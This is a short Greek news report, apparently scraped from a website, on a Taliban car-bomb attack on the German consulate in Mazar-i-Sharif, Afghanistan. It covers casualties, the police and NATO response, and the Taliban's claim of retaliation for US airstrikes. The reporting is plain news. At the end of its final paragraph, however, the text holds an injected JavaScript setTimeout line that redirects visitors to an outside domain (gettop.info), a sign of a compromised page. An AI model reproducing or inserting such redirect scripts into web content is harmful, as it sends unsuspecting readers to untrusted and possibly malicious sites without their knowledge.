Αφγανιστάν: Έκρηξη παγιδευμένου αυτοκινήτου στο γερμανικό προξενείο

0
9

 

Όλοι οι Γερμανοί υπήκοοι είναι σώοι από τη βομβιστική επίθεση στο προξενείο της Γερμανίας στην πόλη Μαζάρ-ι-Σαρίφ στο βόρειο Αφγανιστάν, ενώ από την έκρηξη του παγιδευμένου αυτοκινήτου σκοτώθηκαν δύο άτομα και τραυματίστηκαν τουλάχιστον 84 άτομα.

Ο Σαγιέντ Καμάλ Σαντάτ, επικεφαλής της αστυνομίας της περιφέρειας Μπαλχ, είπε ότι αυτοί που είχαν τραυματιστεί από τα θραύσματα γυαλιού στην ισχυρή έκρηξη βρίσκονται σε τοπικά νοσοκομεία.

Οι αφγανικές ειδικές δυνάμεις εξαπέλυσαν ανθρωποκυνηγητό για τον εντοπισμό των δραστών. Η περιοχή θα αποκλειστεί μέχρι το πρωί και οι έρευνες θα συνεχιστούν μετά το ξημέρωμα.

Εκπρόσωπος του ΥΠΕΞ της Γερμανίας στο Βερολίνο ανακοίνωσε ότι αφγανικές δυνάμεις ασφαλείας και δυνάμεις του ΝΑΤΟ βρίσκονται στον χώρο της έκρηξης και ότι ο Φρανκ Βάλτερ Στάινμαγερ ενημερώνεται συνεχώς, ενώ συνεδριάζει ειδική ομάδα αντιμετώπισης κρίσεων για την επίθεση.

Την ευθύνη της έκρηξης ανέλαβαν οι Ταλιμπάν, οι οποίοι σε ανακοίνωσή τους ανέφεραν ότι η επίθεση διαπράχθηκε «σε αντίποινα» για τα αμερικανικά αεροπορικά πλήγματα τα οποία είχαν αποτέλεσμα να χάσουν τη ζωή τους 32 άμαχοι στην Κουντούζ του βόρειου Αφγανιστάν την 3η Νοεμβρίου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here